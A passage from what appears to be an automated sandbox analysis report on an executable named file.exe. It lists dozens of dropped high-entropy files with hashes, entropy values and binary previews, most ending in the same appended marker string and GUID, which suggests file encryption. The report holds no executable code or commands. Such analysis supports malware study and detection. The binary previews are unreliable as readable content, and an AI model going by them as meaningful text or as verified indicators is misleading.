./...7S."....r..r+bY...i....0..K...5....$.q.Z*.6'Z...D..s.Vrn...B.....Q..W*.[.tHl.sWP.a..oc#.....9.#..h..
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):910
          Entropy (8bit):7.755592803364772
          Encrypted:false
          SSDEEP:12:09vOwkAxZlFckbGJspH8jHA31GUgpebhsV24cv8An2aLJPa02b/kWgGHlsx5W5E1:apk83VnXg0bhs8XbvJy0ERgGWiCiTkbD
          MD5:58305F75B4E48FB03DACBB2234F00A8F
          SHA1:0DF57537DF5F34A58E42345E6CC2CA28BFCA1CBE
          SHA-256:BEFE878BE7CE3C02C9389475776949862E3F4167DF41D6CA9981A78CF75FF936
          SHA-512:FE71456315568AA6915A6F90CEAC82964EAD80C3F719D3B9ED1A22690BBED6B3E646CE2E9B9173CFAFD2AE804F06DD3B3604848C7DA2527E31B7EB839CC8CCA9
          Malicious:false
          Preview:<?xml....~FQ.....&X..zr...../.M$j..}ApZ<.....qF.=.].....N....u.%m...n...^.F..TV.........*s.v....7.0.7.../xH5...O......Q...Q....._.f..?.U.1.5w,.........S.?.....U...0..Z..>....T~........%0;.K.....W.*.]..&...=...ktS..!E.....7.......O..T..o......;*.u.t...A.O.6z}.1..b...S.0...s.6..`6r1.t..m...P0...N.....X..W......4.. ..y...Y...VHeo."Tl.1*._[.......'..H..U.....,.K&.F....L...\..I]Vdo.......}.5.e........}..h.SW.0.lt.....,.E.y.Ti.d...,....A._...W....k.0.I4dh6*h.X....).u...x..U.p........*!....=.VQo1*....Q.h .89f.........TM.<.....05...[.9..EX..1<.......<...CC.`...."1..Q.L(g.rf...D...y..byE.e.tW.+.&#[..E.!or.~.i.ka........Z..@....\....h.d.I/..f*......6mA..~.....a.....M....W.m.@^.F..E..}..~.......8 [.."..I.VB_;...^.............-I..G.G..|......z.V...tH.:.J.U..........#~.a.JKX....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):941
          Entropy (8bit):7.782545162773547
          Encrypted:false
          SSDEEP:24:mz0CSr+evQAo5MknGyXFjzPOf6qcvZt3/aQK6iTkbD:ql4QZ5PGkFPsdc+QCiD
          MD5:3ECF1202ADF9322E5015D9941217EA39
          SHA1:C50605634205E1BD7125CD69F0456C89BC52E757
          SHA-256:F75DDB03692BF0323574FE76568768E4228913EA7DEAFE2699F64499610CD34F
          SHA-512:0AB094385369B7A941FB947237C9F9046AB55F89A6F754FD54A48FFC14B350C4CE2B1BC334AE27365C7DC37F924837B05E26799AAB5010222C4F1C2852BFD3B5
          Malicious:false
          Preview:<?xml.)g.....=d....~P...v.T....M..9"q@S....u.x.+d>.... 7"^....U....O].Y/-..d..i.8h....,.T.WK?_...|.$..q..Emo?Bx...@W.....=.8.h1_.*.$.....d.....T..F..;.[..i...<.x.&x.h.w..!....y.DI..<.7.....S....o.`.h;.5e.P.......Q.yI8.ra_..H...D...H.g.k..........5.jOc...jX..m...p.:5G.d...UM..L!..(jv.[..._]r.vWp./...].p.......j.m.S..W>...*.@..*K..HP.4......F?.....b......L....cZ.Ib...e5...?.gb.,.7.|..<;....(]W,"Qm...../....\F......yr$}gE.........)..lXX,..o..F..\V..w:i..JT 7.g....:W..u.k ~.%.....J.?Z....{..%?V6.W.)..f..%+.P....UfB..d...b....y.{.U...Z.........e...Y.3.d'.>P.!7\.(.....ot.c...iZ..\.c....E $.\..7Fa..=.[..>L..:...'...g......t..+Q.s...$-....4+.n.`.s.L.l6B..,....LN..q....,+#....lu.H?1..K....s..7?..Z.....x.qY..%5m..?m.e..Zp....+..+m.Z/<.e..d.q..kP...85...-._.e.*.x..F: x..Z.0.|..:.........1..*...?...o.5)K..#..s/.f..M.-&.gb.Z..9.+.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):787
          Entropy (8bit):7.716135701785493
          Encrypted:false
          SSDEEP:24:HxR/PUNW8aB9WCEpYmFxvgcMfydwIeiTkbD:zPUN07oY6vgcM6PbiD
          MD5:16600F455DD6569C9A227D231446BE5B
          SHA1:F27581AF85C7E02F7A63F9F64EDD4E836466A983
          SHA-256:705E7F78784910802B73ECD86F67A328D4335649365C5855CBB1681FB4E48915
          SHA-512:7A850E4F46682EEE522142AEE6D14E9C91C0A7C2125D2E1A829406BB5A4C68FA60D52E19944D70EFCB8C4314460008F0BD57B80916FC1E7A5E022A4454344DAC
          Malicious:false
          Preview:<?xml\i...t.,.`x...y.......b.... %...YF..(..*..@.5.J...M...|.)....6............0..ce...|...S3H/..D.qp.+cJ....J....3j.b.x...|:..z......%..!.........&R:..m...6.by._N.Q.bA......?C.*....h3!..b..=4...i++..N...v....L.w...;k..~..*.h..q41..*..Q......b.F....3.4....H.}.0MXy...t...Kk.J..>.I..Y.wf...i...t/.N.*....7.X(.e^q=..(....wN(..7[..V#NG,!..|.>ZIQh...5.~.HIL.x..X..|../ ..X......2..... /....a...........}.......P..r..Y.'....I..g..%\...?..f:.R*.rn...UuT.3...@@[g.....R.l..T........,.`...kW/.Z.W..(.U..{.q7B.....==.S }....{#."H..6.R...... ..X.......9.........Q.....e..4a.EmMf..-.tEm.........5.....t..5..V.p..$.k^..#.^..2....%.y.:.._AN.r*....}>{.8..J.H3.U.....e.C.j.v..M.%.5)lW...y....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):961
          Entropy (8bit):7.795412366622312
          Encrypted:false
          SSDEEP:24:ayrbbWpXgolx5LL7DbDmezQPHipdyTLuTjiTkbD:aObipQmfXaVPCp2PiD
          MD5:AAE217DFFBCC899AAC6FD65EA0FA9DCB
          SHA1:007EEE117951E9451E4EB7C1D644D7A087FA8844
          SHA-256:4790A1445A3C9EDFF72A3ED864AA56591B257C5CEBD759D1180C26F95ED31ABC
          SHA-512:0AD8CBBFAB3925C1888CBD9600F18A8DE27B608FAF1C4643C0745F53C1D9481DDD1BEE03774111C32732EF0C10CE62CC94801D5C1D853A8B52B80D6084A828A3
          Malicious:false
          Preview:<?xml.t...Y,..^.9Z..vV.6.=R..y.{ex.P......ly.4n.b.~7]....8.Rl.bp.........K-.?,......,..9.$...X.t-...../.s0..5..../,N..8>.^.w.g.+..g.]-..M..81N.Ex.....Y]S.0c}...s.......k.~..R..XMV@.`E............x..".>p.1u.#.D..5'....k..VLe."..2.".dn..2..m.Yt@U..........*H...=S.q6*.H.}........%Y....H.#.hOj..p."..$>.\.&9....(I]....7..a*..U.%A.t...wg.#'.B.qb-h\t...N..W..%#.I.5_.......#..A...a...X.0U'...I.:.?..|....yK.....b.....v(Z.92.....@'CC..1m...x.z.L..A.o...VG......r-x9.`<......dNG._.~..i9.M..A.c.....D........j1...b..N........f||....n....<..]...._.R......B.l.....Q.......CR7..4...,[...O.....Ia...%..!...........}ZG..T.0Rsn........S....?.d0...g&..I....h.....Ma....62.IHP3...P......9..{......p..u....t..d=...3.W.......;..[.e...=..1...J.....Z:(.|}.0.2W..Y...E)d.....Y..F.%...".V..]...:..jHwS...q{?~].....l.t@.7_.UT(..3ETd.....6.`q@/1......r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1131
          Entropy (8bit):7.807142420506996
          Encrypted:false
          SSDEEP:24:CMCDeNUcyQTnYwAslBgQwM+WWEQOU2yWfzlVvQkBNl4khoiTkbD:LN1yQT7lBgh/WWEuVWfzP3H4kPiD
          MD5:8FA52822345F37818A77FB5DBB27143B
          SHA1:6309CB949745AFECF8FD2CF2470030C62F613D80
          SHA-256:1D3B8495040758F217F644724BAF700FA186C7D934707DA95C8B7AE46B992272
          SHA-512:8034B52CDCB3E656140907B00F008F4F1830CC666C281D9B4B46230F43F79E9B10818E99F8404A5B0265C2684F28242E3BF3A7608BC54038D704BFAA402F9190
          Malicious:false
          Preview:<?xml4.o..&.....>d..0B..@..p)X.........';.Q]j~8.).....6j$...O(%uQ.1..Y.I...P.h.H.A....XzT......rw...:../Rvp...:D):.A...2=j.:....yN..`..2..N...-..up..j.(j.>M..`O....bK.8.....yX>.$...2S........_...d...|.1s..?.@.!m...q..LY.....w.......Z......x&...D..D.B...b.`s}..}6Yny/...V..9.5.!F[x.... ..e.Z{.3.b......:-B6: -'s.s.b......p4..&'.\F.. ..........k."..2.....s@........G.....?.D{:x........Va....a..o..H..i?...e.....x..nD...L..\....2.\..;[q..z7./...,..f.J?..".s..^...5|..`...b.#..N.V.C..?...q.&..O....,.;s.H....##...h......;.....g..:..w.o.s.9e....R...@...PEF.YY.(W0..E.{f.uL....S..q.9.i...}...a4[l..........NU..`..v......r!.NRk...7vx*0../....n...HV.0|.E.Jg.".....k...5|.5.T....m.`..B.9..R3-.(. F~q....U.B..m.$..[...PdK.'R..).g..........u..$.WPP....-...z...+.9.!.t...w.^.T7....t...Y.&1.*....R!..UyYL..u..*.P...{.;P-./...".......d.O..N.....m....xyD..........wA......*{.:....B...V..dc.e.z....<{O.....7.........q. .....?.1B.s.N...._<v...s...o....I...=WB.z....|J...
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):987
          Entropy (8bit):7.78308662869357
          Encrypted:false
          SSDEEP:24:4zu/xtc4/4MdsvOQSlXxcVkQs7Cig3udrs05AWiTkbD:f/xtLamQSFxcneCiDdFGTiD
          MD5:C7C2E69A9D53CA3440972BF5F1C66731
          SHA1:D0749E884381C70FDB5E3B6C8DD0F04E11949DEA
          SHA-256:BFC791D38D1689C7C38E8991828F8CE80F68052414600AB5C3D8627D7415EB0C
          SHA-512:0B28D1FE9FAA55596E9684978D3EA0910ABCEF0B306B744F4AEDADEC206CFA94EDD7508F90838CA524E6B175B71A7384CD1C7B66DF93E4706D4178237BC3C7EF
          Malicious:false
          Preview:<?xmlE...&s`VA..<......w.%u%B]........U...[h.....$....O....T...(LMM..O."......D..V.........u..Y..p....B....W...*Y..Y.....[}I....7...%....4..f.\.!0.S.!+.....V...wjR....-..R..7,........S6.k J.z..1.|.[.+..I..V.2.-..pt.R../.'+n}...._$..........?5r./..o.X.iK...C...}...$.......U.w.....V^dnQKT.. ..rTa;...uL..x*...N R....rc......g.$....K@.......A....._......9......?5n..Q......g.r.......>x.3.....w...={.j23sr9i....v...yr.q.......e>.7.A./uD.^....P/.3.b'...:.y,..OTQ.RY..X!..+..Y.+.....I.Xns.v..aP.".[...5f.+.... .k.n.EEv.:J.d..f$f.-*..@.....i.w...S..B..cw....^*:....2}.J/...~.......k..;..i...V$.=.`..&9..0...t....7~.G..d^..O.v...}.|....1....C.<..E.;.# ..u..k.X...z.3........,..k.........mP.0....U.u..[J.....V....pe}.=H.:..3R................x...A.6B....23.IQ./.......1\.>.x.!.jD..qM.6.esG..fI.G..w...S....ez>...?C2..<..%....+.S0S.....n..Cp...W.......Y..$bCA.O.ch?L.Er6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):857
          Entropy (8bit):7.745181653892647
          Encrypted:false
          SSDEEP:24:qnjeyW8sqNp0qk7Gjw8L0qpa/Nsz5aiiKMS5ijDiTkbD:qnjeyW8sKpc0wz/N65aihMS5PiD
          MD5:E779A739C177570457C8BEC641D0C537
          SHA1:74424BD05C3F790FCF356617EA61415320FDC076
          SHA-256:369519BC7B5C4F51A37B3CC745C43C30DA8D9F63AFEEA3DD20B51A0A1F975847
          SHA-512:C85F671062B06004941125AE3006C4A9227933DB0F57546989EF494289B7848BF8C7E84971F07DBDE281B084B438D8EE4134F4988D31EAB6DBEB94AFBD75DFE0
          Malicious:false
          Preview:<?xml.."-..K0.b.J..Hk0x.d...7.m.6...z\p.ba....Q.......z.]0|@..>..r.C.?..m..'7.eXj)........Z_.x......v.9.r.;h.<....G]...md7.+J.N..W...$...=R....v.[3.T...7OUU..P.t.f..6d.....9[....w.wr;..U.....a..`.vO4..oq...c...v.m....R..78...`g1*.H2tGp@.fs.>.->}....AP......E..#c.C..g.w...@..I!j...sz>..y....m.do.....}...c.....\....E......h...n.............>h..1%....Z....8xLg..6.V.}...+\.#....oV..Wx..`Q0y....I\.\.TZ.I...).......D.{q...Y.....Du........).~R....-....ku..}.?V.H..L@H.Hv?.t...J@C.........a.p....)^..|........T....t.#.6......e?..Y...H.X..Sz...X.../...=r..o....../..U..rP...}....M..I......s.M};..TU..34......P.&.BofbWg..Nc..P..FxR.6Rp..Zs..O.EO+.T....iK.F...9.3..r..Y.%.s.\.].A.p..|Ar..5..1..Dg-r..Zc>.. ..y:s*VM...?r....V.^..../..!...h..8.r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):859
          Entropy (8bit):7.700132782695368
          Encrypted:false
          SSDEEP:24:TFqs+xqujk3Dm8P+BXoSxyNEVxQDZxPiTkbD:TF8gj3C8P+YSxyCVAzKiD
          MD5:BF8B138B48C478C0DF66A6A28463AB00
          SHA1:0091932230259661477D4984C0ADE496D80F7B71
          SHA-256:BAAF9988FEA904E485E06E005FAD9EA954F5A712ADA7AEE273B8B420BC9CD962
          SHA-512:69FBCE403B512E4024C20299A004AEA1B3B9413A3BFA6B8A76747F556C45B72CBCCB973A130E1DC8E555144F93054D32348BB1B761C41D0DFD2CCF6A7B0F8B2D
          Malicious:false
          Preview:<?xmlP..1..1...rBD|!.'k..8......J......X...:;...-_d^H..caZzUb`3g..C..T6f..M[`...........!.."..,...._..mC. c2Xh....JK.L.D.4...#...M.DK..1.k...l$.{...V)...zO.Q.~.N......;;.h..".Q..\.W.2..I....t..B..v..0....ve..A..6.TP!..t...E.x..*.D...KW5....w<...)~0...QT......g"5A.:'u....z._*2.$/TO... .v>....[.../y....F...sr..z.M.bC...y.s...$...&...[.....,vI.....A.fi...z v+s.J.....O)z.BhXN.u..l)d.....!....C..?..$....$r.{./@=?...o5..k}L.w n.....4B..=.]...}....rW....).d>7.:.i.41w..|C..;:r...4.=.Y...8.....3.@7.[..p!.K..^....A....!....t..@P..O.........i..S..e....T...6......m..I.~.?......|....5r.I.3617..|C...?Q..O.>.G.kc*AN.2.x....";+..i.P.M.].....c...E.T..M....|.?..P....5u....n+.. Ys.O.M..M..=6vI6...jC....J.TeA.l....B.D..pzm..J4...t7.K?.J...U.J....8....a..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):725
          Entropy (8bit):7.684288117968908
          Encrypted:false
          SSDEEP:12:idhSC9P85MyFwDy4tjTw2eQfVzyAxJjhSvG1hp8JlPEQzcyMQImixpZacii9a:i7E/CDZ9ZzV/Sk8bcGImiTkbD
          MD5:5823BA310B98B8A618A2F36EFA5B02B5
          SHA1:93135B939365B79A84D927B866AC38214957FEED
          SHA-256:4EE4947D41348E9BDBEC088A67F6365AA44C81868FAED285181FF4E640D33C60
          SHA-512:5D64E130B2999C059361A1361ABFC52600CAEAA0FE052CAE920AEEADDEB86691CB03D064B15E2E348D7CDC9E2BDD00F2F08935BB20DD95E7C4A6C0AF5B9CB46C
          Malicious:false
          Preview:<?xml..c.?1..7.|...;.P..JP.0tH.."..&..@lD..0).!..w........"......Q.....e..h.^.t.Z..=..p.Y...B5.b.....=..U.KV.b..s.`....fu...a..g.]..JT.....q.z...Y.R.y....u.......A........OJ:`.....5..%..!..t..........{n.=.....;L.>....e!.A9eQ...=..7.....'.....g........p....!'R.Gl....X..<M./......m..,%..v"..{..`...$2..W..].]....q2....zx..k...R.eh,.?S.....(.o3.&...Y....iuQK]...N.........0.....GHj5._a.7.J..Y..v4...../...s,....w.yUWF.....Cv[..J...x__.c~>.M..l...yH/{....uJ.....u....SzVy.k.v...c....fi..C(.l....b...n......*\.U....xGU.(.0.yN....72...^.b..E6...PS..!..<.4.....,..72._.x.........>.\.N..>.jV.u.#...C.,..Z......B^*F.Jr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1175
          Entropy (8bit):7.823716905730162
          Encrypted:false
          SSDEEP:24:cHqcN99iXX1SvdRChBKJf0hgS2BJW5ZBgUHiAj/VHFQFN5HmdmosA174x+iTkbD:cHzPUXX1Sv+wJf0hgB45zgmX/zQFPHmB
          MD5:472A0ADD8291023777566F96574F51CF
          SHA1:F115899F1854B16049D4CB8725E3D4686A5DCA13
          SHA-256:4041D08EAC3BCA7F457DB428115154482D757F1E9FD2272B0516D36B0CB9B82E
          SHA-512:977AF7A1C623EE4D5FDB43215D3DE2BC95B82E9C763902FD3748D78CA8039F6AFD32C2A8A451E0C45212979C1B4FCB19E527E1BD684CCB98951F069BB1BDA913
          Malicious:false
          Preview:<?xml.8.,....f.Z.#.t.2x.U..j&....b...M....NMv>H.OU.V.2...T.r..Y.T...fq...&I.=.......z...U.u%Q..!G...LO.......4.QQ.p.V.i....H....s.az|Z..,........`...<./...8.F\.;TICi0..8..P.T.&g..}.....?..H.O"z.R3.<s...mnD.B..Hu..TGk.=@ .6.......Y...u.b..~!/.(.....j.."$...........PTr..m...e..... 9.{....O.VF.....0..!7"X.%l..G.E.2...c...~$.Gn\f"...H..u.H...w^....f...F.c.l..'.Va....5.....G.O.#.c*.M.....kS.I..E...Q...o.O.(.*../.f............Q.`..9c..v.[.P.d...>z...7hTZ.$%.(...D....#./o..+..(...Y..""g..a..u]).=...8....a.$$..t3"*.n!....9.s.G.mYtP;.D.#;....guV...$..y=K.....Q..(.q.!s.......J.K.iZ..W.....tm.......z.JG.v.Y...~..../...Pj.ZMC=<.J..I?_5I...R.O....O...j...R..*S.t...%44....(.&!.m.d|....J.=.....-.!..I.*.. ..u.{..%.... ....|:......bU....d%.......]..../.-4..b..s.C..:..`........S....?...P.N..Z......%.t....I.C.!ai.<.....Q.>...,.O...)..4.N00f...#...(..d.o.eW....S.vO..H.L......=..]..Ou...3..[a.J(.UF.c.....\.".p.kBC.:.t...0.u...{|3..*.@.....vkp.Y.Y.<..?....SQ.61..3w
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):724
          Entropy (8bit):7.668232114111862
          Encrypted:false
          SSDEEP:12:apKrWplXZ+q/xfDzX3uzOgZjnd4ohOkPJDxFCSWY6stCAjrDO0TSqXUXKixpZacq:a/lvVDIndnhOkhDjCxY6s8AHDO0TVXF1
          MD5:1C83DA9F8D6CD8DF21FA9A59D4FF67A5
          SHA1:BB7A2230598B110DCFEB904221007BF3157C979B
          SHA-256:3C6A18AF1CA4FC179B5B6C012DB9FDFA4F3EB9507CD5CB7C3972F02BCB6B9712
          SHA-512:D29465FD4EC0556F499983832F9838323F353D770D29EB8EE2A1DA37025592DD923A301D50A0FECE261BAD25F05B46753758F59AB02787136751E724B2E13EE8
          Malicious:false
          Preview:<?xml.....l.qe}...J}.A..e.]z...2@.3.5.E\X.9Ou....Bha.GV....c.....#B....qR..[IG{#.....l.|Y.~6A!%..........j.A.`Q..ny.C1.......g..t.C.8.]4.|.G.J..'Un...'5....j.3...tt.s...H.....Q?([a..gS.$R....;.....<..+Z......O./[.....'.-{]]%&....I..D....At..)X..#..A..b.Zv../..(..=.m.c.}....T.9..5.x........z....`.C.a[E~o.m.5.l.e.......0..|...471U.)l~2k./.E.....W.u..\\...A..0Y_.k....'...#..Ttb[...$.....).L5:..`....h.......a.u..1F..G.O..h.N.C.,...5...........j.S..Ia.....~4ITU..U...@......a..;.).........H...=...sx..b..K...B.&.z...O..A.....I9*m......<...q..Pl....(..;.....Z.Y.B."..I..Qw...H....y_]d.78H..U..I.7./..!...\..9t..V...xJ....Sr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):746
          Entropy (8bit):7.727956856981108
          Encrypted:false
          SSDEEP:12:7/lrkVWAWe+5ieNZnlfIoooOpA3ldola9EsjmaBgOAwFDhkObH5QixpZacii9a:DlrZAWe+5XZnh1OpoWEqsjmaBgO9rfjK
          MD5:FC1AA7853EE7112B04A0D7108FDF85D2
          SHA1:77528B2633A8D31BA15E9A0566F529E8EFC9DE90
          SHA-256:7C316E1069ED14CC0996902ABD9CF7DD3CB0C1D7508360B89E9A81F440F43AD9
          SHA-512:114D90C04988F03A49D7671027C4C82B34B67CC7CF867DEF0BE017ED8C4C3F5E396938316719F42DA99EEBC068455B2800C59BAE2D2D6CCB6DAD69F19DA165B0
          Malicious:false
          Preview:<?xml..W..A..K5.Z.ce.]`'..d..s..L.....;n f..<(0...'.9.....L..1.5.o.Q..y.........MZ..O\.Z...X.v.vGq.*..S.K`D.z.1.1..d..K.....^(..SJhQ.=.8o...4..b|r.o.Q...XJ..,...G......{..9k=u...0./..A$Z...uC.o........;V.z....=..T...H........(z..W.V..0.1...I<.}...q.9PI........K..=._..I.<tMe...%..P./........%?)."Mn:../H...S...E.P.8..`u.Gn..e........~.K!..|.......<x....M/..S.v..K.u-...h.....\U(.q3...Zr..:...z~..y..c.n>r[.71KO.....<z.d~...].I6.)l..., ..N*..2.....A.r......;...Y.c......Q....z_g&.U..<K...r.s...|.N.?...X...$.*...\x!....Y..lw$.x6..U..p..P.L...2...@.k6....=..0-l...&.H<..j.~.,..e.s/.b>....{f{.I...aO...:4.W..tW8....Ar...R...;\.E..p....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):857
          Entropy (8bit):7.775763723081786
          Encrypted:false
          SSDEEP:12:lzUeNbx61rb+tuAYiFQEQT3B1oKjRLSldXkRKwn8UvH3cbIpw9T1P49cbUUixpZE:xUeNbw12kAYiFp+1hIIMbIQziTkbD
          MD5:BDA23D78796F64184471959012B73453
          SHA1:B4D180F6277B6E6470DF6CD2C849C679BE1AADEB
          SHA-256:1AD76FCBE53766E90529E536150AE46DF5DA549C2D91A4E3284FF8B33AF12C5E
          SHA-512:D1F9592FABDCAF89EBB5B6270D739926958F4823331F2CCDBF3AA7FDAF478C07AA9F6F27F5F64ACED5F6F5548A02453E191220E36EC0837391C3D14D6FFFD68F
          Malicious:false
          Preview:<?xml..9..}.H'7........r.....2.8...}."h3[..bg...Y..\..ef....:... ..|1....No-).+)?9[...q..._...l-..&tz...!2M'e|...jm.....8.x...7iP.s...5..K.-H..E.......&.;.".9.....m3D..ls.....wA....".....)...2..f[.:..>.M....&.QA..N...k...(....5.*9..._....:.s*(17=P.1.......v.Dn...Zw.].....x...N.bX.X+s|.... .q....K........e.....C|.gV...^"..#.G.......1.S..#U..f..:....;.G).3.tTW..-..jM.>8o.....F....t..8P..o.|.......[Y.F......%..P...*'.._@J.LV.6.;..g..*.d.M3...~..;N.}.Y.Y$G..4P..n]'>.4Go../;=2.J...v...rzK..s..a..7....D....JfFX....A..x_.........L..8hG...n..1b@..2...8./?L..f.....!C.Q&I.l6m.-..I.c=@]..:......Y.LE. ......Eu.q...8K...IC._n./....^E...*.T8c.?`k..;....p...Md...-w.......b.(..(.y.......Ch...}..r..&T..........v{Q|z..z_.}.8k..u,],r......S....r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):886
          Entropy (8bit):7.74247613325776
          Encrypted:false
          SSDEEP:24:d2vyrhRU24dg0vM32HuoFpHI7qaVKlv0k8vAYZiTkbD:IWR4eEhF0qa4lck8vAHiD
          MD5:3798CD9A0B40DC9429C596C2F2B22954
          SHA1:4E036B12892518B7DFB70BD77C6727132381642C
          SHA-256:5104D9CE97C32E637215B5A473EA614F3CDEB124BF480715B3D4AA36D48B4389
          SHA-512:E3CF2E34F7E09DBA13CF2302AE2030B024405C84CD451519D7115507B6039F4392443A6D6E472D85FF013C0D7EEB099C6C49849A3C8664012736A3F9496407B0
          Malicious:false
          Preview:<?xml...v...b..7...j.{.(...&.......u.O..xpX8-.....7.l.y.PJD..4|...p.......{.....mz..J;s..Q..Vw.!..k.&+P.zv."A%....z.`P..9.......8NchX.....i.=..d}....w..g.5.....A...y..yl5.%..[E......<. ........m{6b.......M.......(.......N.y..^%....a..@.....T|.+.&.X..NF..>.)..Z.0.j......n.a..z.^.b@.I..M.P>e..;.$.Pf..b..._.....5...]f...Z.7..o....A..S.Ky6.....|../xDX.j...'@.%h.f.q2../q..~A&.....6x..._.P:f{y......E.........N.._.v..(...T5...;4..*!..fY.k.b>....4.l]Y...N?.(..$@.\..UiXA...@......t....Z.t.7...l=?..D.`I "........!...U.-.;Y)...+..r...O~{....)0x..o.....Ia.....U...|..........J@..rK..3"..]../.....>...}.;.|........^...>.u....l..+..2g3%)..d..%5.K....8^(c..cBA6L........r.j(*./'.G.>...........I.d;f5....Q..zF.'.y........A.....K.*.k.....>......Z.db~4Z..#"WNy.c.l8|h$..r6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):1003
          Entropy (8bit):7.78191195210764
          Encrypted:false
          SSDEEP:24:vYoWVauEfihQKkEJeeCB3MkQPQorouaOSteDfjV4RqciKggDEgmriTkbD:TS3EaaKlClMToocujSujW4ciqiD
          MD5:04779DB841A1EEBC6F2025440DDB9716
          SHA1:63AD5E2AD19A4A6004241B8D8C58D078B5F0D9F5
          SHA-256:D369BEF80C7E51D92BE1897E927370E84DDDF82A294CBBF62F477842376D7E0F
          SHA-512:3B4BDC49D60A6CB51192C675086062D9E52EFD0420F02B87DFD5056A6599C1F8E09709BB93199427663BAA64A1FF9B60C7C74E85999499CE9EB98DC6905885C7
          Malicious:false
          Preview:<?xml...a&W.....vm4I...5...X...c\...}R.;.fl....r.0..N.5.-H.2id.T.....-M.b.....$.%e.a.n|.%N.&^);..&uU.+...$...t\...>(kt..Xz.[.....q^.A.....:...w...+.....w....xr.X..!.Q.. .Y..[%,X....<.....3lF9.2:98.....ym..'._h...s]~..yl .q.3..^u.!.0.+.f*O..^P..Y.D..s..$*..W.F./.{...F..`..2W...Ob..c.>..&....(..0..a..8q...\.W.l...v|@z..K7R..Hw.d...Y..{.t....../ oY..w.O".#uL~..G..!..]./...?..l.E.m7'...;..<...}...H18.V.S_g..`=].!.I..QIs..a...#h...eH.5C(.i82..g77..p(.Mery..t?.a.....<.!?..i....<S.|.`X.|,^..\<.-..<....q.<.]N^.....@../.4..u(..,?m.P....A.S.K.M.&.=.<.....J..4M.6.Tz/...C ..3..f.v.......MG..l..N'.1....W.(@O..0vt.....;.(vq."..,..{..]n?."..6...5.l>7...x^...'srR(4..eS..."....M.6~Tn2z.t..,.....'.{..u8..+..e<S.X#.PF....Z.2.S....'.F.D7.sH..z...&.]*....R+.X.F.\W..../#Eqs.E..8......G...j.<G...*....p......}W.5........U.....q$.>..1..4....\..t.+.H;Dq....a...........qX.dC!.^o...[..I..D..X..Q..|b..M._, U lr6yxl1GT8iG2X6JaJ1YNnYz19XjwMZnkCEzV04l5{36A698B9-D67C-4E07-BE82-0EC5B14B4D
          Process:C:\Users\user\Desktop\file.exe
          File Type:data
          Category:dropped
          Size (bytes):726
          Entropy (8bit):7.738218597114129
          Encrypted:false
          SSDEEP:12:Et+PCrBiVTq7+wks5rCAH+a8rP3sORFZEox/yr/iMvQJeHiFip8H5dQQTJoIUYL1:I+P2cG+psya8rP3xThar5yqAip+fJoLm
          MD5:9BDDC574FC928BE9F478E13DCFE428C7
          SHA1:99F673BFB3F319CDC7205F7037BD5D723340E924
          SHA-256:9652F457AE7777B13A9DA6345205BF7CA5267A64E3E2502613B7658926C1D4F7
          SHA-512:71694F01C7A9B4B8711189B90FB90785CBBE6A3574586DA13ADFFE844147C17592B542297F4A7AAB806C719226E03ED59699C9908933EFBB9166640ECA1C2E10
          Malicious:false
